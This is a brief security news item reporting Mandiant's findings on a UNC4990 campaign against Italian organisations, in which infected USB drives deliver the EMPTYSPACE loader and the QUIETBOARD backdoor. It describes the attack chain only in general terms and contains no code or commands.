Health, transportation, logistics, and transportation organizations across Italy have been targeted by the UNC4990 threat operation in a new attack campaign involving weaponized USB drives used to facilitate the distribution of malware hosted on widely used websites, reports The Hacker News.
Attacks commence with the widespread infection of USB drives with a malicious LNK file, which when double-clicked would trigger a PowerShell script that would download the EMPTYSPACE loader, also known as Vetta Loader or BrokerLoader, according to a report from Mandiant. Threat actors then use EMPTYSPACE to retrieve the QUIETBOARD backdoor with cryptojacking and arbitrary command execution capabilities from Ars Technica, GitHub, and Vimeo, said researchers.
"The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset. The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors' side," said Mandiant.